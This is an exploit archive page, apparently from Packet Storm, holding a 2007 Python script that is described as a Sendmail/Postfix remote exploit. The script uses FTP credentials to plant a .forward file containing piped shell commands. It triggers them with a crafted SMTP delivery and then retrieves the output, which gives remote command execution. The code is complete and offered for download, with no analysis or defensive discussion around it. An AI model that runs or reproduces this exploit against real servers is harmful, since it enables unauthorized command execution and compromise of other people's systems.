exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

skyline.py.txt

skyline.py.txt
Posted Dec 14, 2007
Authored by Kingcope

Sendmail/Postifx FORWARD remote exploit that leverages ftpd.

tags | exploit, remote
SHA-256 | 6c2d599af10d5698c6da37d9b221e8084949a0ae2fc59f66e062df0039438a0b

skyline.py.txt

Change Mirror Download
#!python
# (C) 2007 kcope production

from ftplib import FTP
import sys
import socket

print "Sendmail/Postfix FORWARD Remote Exploit"
print "kcope/2007 - hey alex,andi"

if (len(sys.argv) != 4):
print "usage: skyline.py <hostname> <ftp username> <ftp password>"
sys.exit()

hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

print "[+] INITIAL FTP STOR"

def FTPconnect(initial):
try:
ftp = FTP(hostname)
print ftp.getwelcome()
ftp.login(username, password)
if (initial):
f = open(".forward", "wb")
f.write("|touch /tmp/XXX\n")
f.close()
f = open(".forward", "rb")
ftp.storbinary("STOR .forward", f)
ftp.quit()
f.close()
except:
print "[-] FTP Error. Correct Login Credentials ?"
sys.exit()

FTPconnect(True)

print "[+] PLEASE ENTER COMMANDS TO EXECUTE"
print "[+] sendmail allows a single command"
print "[+] postfix allows many"
print "[+] END WITH . IN A SINGLE LINE"

input = sys.stdin.readline().strip()

f = open(".forward", "wb")
f.writelines("|" + "\"" + input + "> ~/RESULTS" + "\"" + "\n")

while (True):
input = sys.stdin.readline().strip()
if (input == "."): break
f.writelines("|" + "\"" + input + ">> ~/RESULTS" + "\"" + "\n")

f.close()

print "[+] FTP STOR"
FTPconnect(False)

print "[+] EXPLOITING BOX"

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, 25))
smtpline = s.recv(1024)
smtphostname = smtpline[4:smtpline.find(" ", 5)]
s.close()
except:
print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
sys.exit()

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, 25))
smtpline = s.recv(1024)
print smtpline
s.send("HELO eyecandy\r\n")
s.recv(1024)
s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n")
s.recv(1024)
s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n")
s.recv(1024)
s.send("DATA" + "\r\n")
s.recv(1024)
s.send("." + "\r\n")
s.recv(1024)
s.send("quit" + "\r\n")
s.recv(1024)
s.close()
except:
print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
sys.exit()

print "[+] RETRIEVING RESULTS"

try:
ftp = FTP(hostname)
print ftp.getwelcome()
ftp.login(username, password)
ftp.retrlines("RETR RESULTS")
ftp.delete("RESULTS")
except:
print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ?"
sys.exit()

for line in open("RESULTS"):
print line

f.close()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close